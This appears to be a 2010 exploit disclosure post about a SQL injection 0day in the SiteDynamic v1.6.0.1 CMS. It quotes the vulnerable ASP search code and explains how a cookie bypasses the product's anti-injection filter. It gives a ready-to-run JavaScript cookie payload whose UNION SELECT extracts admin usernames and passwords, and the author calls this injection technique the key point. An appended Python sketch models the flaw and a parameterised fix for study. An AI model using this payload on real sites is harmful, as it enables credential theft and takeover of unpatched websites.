SiteDynamic v1.6.0.1 Sql Injection 0day

2010, April 2, 3:11 PM. Vulnerability Analysis
Submitted by admin

By My5t3ry
SiteDynamic Enterprise Website Management System (SiteDynamic企业网站管理系统) v1.6.0.1 needs little introduction, and not many sites run it. This is a hole I dug for a friend; Xiya (熙雅) already posted on the forum about the file-upload vulnerability in the FCKeditor it ships. Enough talk, here is the code:


' /page/default.asp, lines 5-122

<%
pageID=strCLng(Trim(Request("pageID")))
ID=strCLng(Trim(Request("ID")))

If isNumeric(pageID) = False Then
        FoundErr=True
        Message=Message & "<li>参数错误!</li>"
End If

if FoundErr<>True then

if ID=0 then

        If pageID<>0 Then
                set rs=server.CreateObject("adodb.recordset")
                sql="Select * from db_channel where pageID="&pageID
                rs.open sql,conn,1,1
                pageName=rs("pageName")
                description=rs("description")
                keywords=rs("keywords")
                pic=rs("pic")
                link=rs("link")
                PageMode=rs("PageMode")
                PageAmount=rs("PageAmount")
                PageLine=rs("PageLine")
                intro=rs("intro")

                If Not rs.Eof Then
                        if rs("pageID")>0 then
                                if rs("ChiID")>0 then
                                        strChiID=""
                                        set strRs=conn.execute("select pageID from db_channel where ParentID=" & rs("pageID") & " or ParentPath like '" & rs("ParentPath") & "," & rs("pageID") & ",%'")

                                        do while not strRs.eof
                                                if strChiID="" then
                                                        strChiID=strRs(0)
                                                else
                                                        strChiID=strChiID & "," & strRs(0)
                                                end if
                                                strRs.movenext
                                        loop
                                else
                                        strChiID=pageID
                                end if
                        end if
                end If
                rs.close
                set rs=nothing

                sql="select * from db_page Where pageID in ("&strChiID&")"
        Else
                sql="select * from db_page where 1=1"
        End If
else
                sql="select * from db_page where ID="&ID&""
End if

if not (Trim(Request("keyword"))="" or isempty(Trim(Request("keyword"))) ) then
        ' BUG: keyword is read via Request() (any collection, cookies included) and concatenated unescaped
        sql=sql&" and (title like '%" & Trim(Request("keyword")) & "%' or content like  '%" & Trim(Request("keyword")) & "%')"
end if

sql=sql&" order by dateandtime desc"
'response.write sql
'response.end
set rs=server.CreateObject("adodb.recordset")
rs.open sql,conn,1,1

if ID<>0 then
        if Trim(rs("PageMode"))=4 then
                response.redirect Trim(rs("URL"))
        end if
        ' file type
        if Trim(rs("PageMode"))=3 then
                filesURL=Trim(rs("files"))
                If filesURL = "" Then
                        response.write "No data!"
                End If
                Call Getdownload(filesURL)
        end if

        srtTitle=Trim(rs("Title"))
        srtPageID=Trim(rs("pageID"))
        description=rs("description")
        keywords=rs("keywords")
end if

sub getTitle()
        if pageID=0 and ID=0 then
                response.write "全文检索"
        elseif pageID<>0 then
                response.write ""&pageName&""
        elseif ID<>0 then
                response.write "" & srtTitle & ""
        end if
end sub

sub getadoTitle()
        if pageID=0 and ID=0 then
                response.write "全文检索"
        elseif pageID<>0 then
                response.write ""&pageName&""
        elseif ID<>0 then
                doPageID=rs("PageID")
                set doRs=server.CreateObject("adodb.recordset")
                Set doRs=conn.Execute("Select * From db_channel Where pageID="&doPageID)
                response.write "" & Trim(doRs("pageName")) & ""
        end if
end sub

sub getLocation()
        if pageID=0 and ID=0 then
                response.write "-&gt;&gt;全文检索"
        elseif ID<>0 then
                call Nav(srtPageID)
        else
                call Nav(pageID)
        end if
end sub


This system does ship with an anti-injection module, but it only inspects Request.QueryString and Request.Form. In the code above, keyword is read through Request(), which falls through to the Cookies collection as well, so the anti-injection check can be bypassed by supplying the value in a cookie.

Exploit code:

 

javascript:alert(document.cookie="keyword=" + escape("a%') union select 1,2,3,username&chr(124)&Password,5,6,7,8,9,0,1,2,3,4,5,6 from db_system union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 from db_page where 1=2 and (title like '%a"));location.href="/page/Default.asp?pageID=0";

The vulnerability itself is trivial and there is not much to say about it. The one point worth making: many people who run into search-box injection go straight to blind injection, but as long as the quoting is closed properly, union can still be used.

PS: The key point is the exploitation technique, that is, how the injection statement is written.
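The collection-order mismatch described above, modelled as an added example (not SiteDynamic's code): a Python sketch of classic ASP's Request() fallback order, a QueryString/Form-only screen like the one the post describes, the string-built query from default.asp, and a hardened variant that reads a named collection and binds the value. COLLECTION_ORDER, screened_by_filter, hardened_rows, the tainted marker and the sample rows are assumptions constructed for this example.

```python
# Added example (not SiteDynamic's own code): models classic ASP's Request(name)
# lookup order, the filter gap the post describes, and a hardened variant.
import sqlite3

# Classic ASP searches these collections in this order when Request(name) is
# called without naming a collection, so a cookie can satisfy Request("keyword").
COLLECTION_ORDER = ("QueryString", "Form", "Cookies", "ClientCertificate", "ServerVariables")

def asp_request(name, collections):
    """Mimic Request(name): the first collection holding the key wins."""
    for coll in COLLECTION_ORDER:
        value = collections.get(coll, {}).get(name)
        if value is not None:
            return value
    return ""

def screened_by_filter(collections):
    """The product's filter pattern (assumed): only QueryString and Form are inspected."""
    bad = ("'", "union", "select")
    for coll in ("QueryString", "Form"):
        for value in collections.get(coll, {}).values():
            if any(token in value.lower() for token in bad):
                return True
    return False

def vulnerable_sql(collections):
    """Query built the way default.asp builds it, with keyword read via Request()."""
    kw = asp_request("keyword", collections).strip()
    sql = "select * from db_page where 1=1"
    if kw:
        sql += " and (title like '%" + kw + "%' or content like '%" + kw + "%')"
    return sql + " order by dateandtime desc"

def hardened_rows(collections):
    """Read the named collection and bind the value; the screen stops being load-bearing."""
    kw = collections.get("QueryString", {}).get("keyword", "").strip()
    sql, params = "select title from db_page where 1=1", []
    if kw:
        sql += " and (title like ? or content like ?)"
        params = ["%" + kw + "%"] * 2
    con = sqlite3.connect(":memory:")  # constructed sample table standing in for db_page
    con.execute("create table db_page(title, content, dateandtime)")
    con.executemany("insert into db_page values (?,?,?)",
                    [("About us", "company intro", 1), ("News", "union meeting notes", 2)])
    return [row[0] for row in con.execute(sql + " order by dateandtime desc", params)]

# Constructed request: the tainted value arrives in a cookie, not the query string.
TAINTED = "a%') union select"
EVIL = {"QueryString": {"pageID": "0"}, "Cookies": {"keyword": TAINTED}}
```

With EVIL, screened_by_filter never sees the cookie while vulnerable_sql still splices it into the WHERE clause; hardened_rows treats even the word "union" as a literal search term.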
